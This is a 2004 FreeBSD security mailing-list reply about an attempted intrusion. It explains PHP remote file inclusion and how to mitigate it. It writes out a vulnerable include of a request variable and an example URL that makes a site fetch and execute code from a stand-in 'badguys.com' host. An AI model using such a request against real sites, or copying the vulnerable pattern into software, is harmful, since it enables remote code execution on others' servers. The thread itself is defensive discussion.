From owner-freebsd-security@FreeBSD.ORG Wed Aug 11 21:24:10 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7899916A4DE for ; Wed, 11 Aug 2004 21:24:10 +0000 (GMT) Received: from master4.yvr1.superb.net (master4.yvr1.superb.net [209.90.166.20]) by mx1.FreeBSD.org (Postfix) with ESMTP id C580243D48 for ; Wed, 11 Aug 2004 21:24:09 +0000 (GMT) (envelope-from gbaratto@superb.net) Received: from chivas (fw.yvr1.superb.net [209.90.166.2]) i7BLO6ne020501; Wed, 11 Aug 2004 14:24:06 -0700 (PDT) Message-ID: <015701c47fe9$83dc7ff0$9c01a8c0@chivas> From: "Gustavo A. Baratto" To: "Ryan Thompson" , References: <20040811145637.R41454@drizzle.sasknow.net> Date: Wed, 11 Aug 2004 14:23:58 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1437 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441 Subject: Re: FreeBSD-SA-04:13.linux in the wild X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 11 Aug 2004 21:24:10 -0000 I think I may have seen such thing before as well... not a freebsd problem though... It's php's own fault. php comes with url_fopen enabled by default, so if someone write a script.php with something like: include ("$var"); One could call the http://goodguys.com/script.php?var=http://badguys.com/malicious_script.txt the text of malicious_script.php hosted remotely would be included in scrip.php, and any arbitrary code would be executed with www privileges. just disabling url_fopen in php.ini would prevent that. If this is not what you have seen, please, I'd like to know more about it. Thank you ;) ----- Original Message ----- From: "Ryan Thompson" To: Sent: Wednesday, August 11, 2004 2:07 PM Subject: FreeBSD-SA-04:13.linux in the wild > > Has anyone else seen this in the wild? > > We just had an attempted attack yesterday from a live attacker on one of > our machines using this vulnerability. It wasn't all that clever, and > they're long gone, but I *did* manage to catch them in the act and grab > a copy of the binary they tried to run from /tmp/, as well as the PHP > injection code they used to subvert a virtual web site's poorly-written > index.php script to execute commands as a local user. > > Their first order of business was uname -a, and the timing of the > requests appeared to be random and experimental ("cd /tmp; ls -la", a > few times). If any @FreeBSD.org developers would like more information, > I'd be happy to share my findings and log output off-list. > > - Ryan > > -- > Ryan Thompson > > SaskNow Technologies - http://www.sasknow.com > 901-1st Avenue North - Saskatoon, SK - S7K 1Y4 > > Tel: 306-664-3600 Fax: 306-244-7037 Saskatoon > Toll-Free: 877-727-5669 (877-SASKNOW) North America > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" >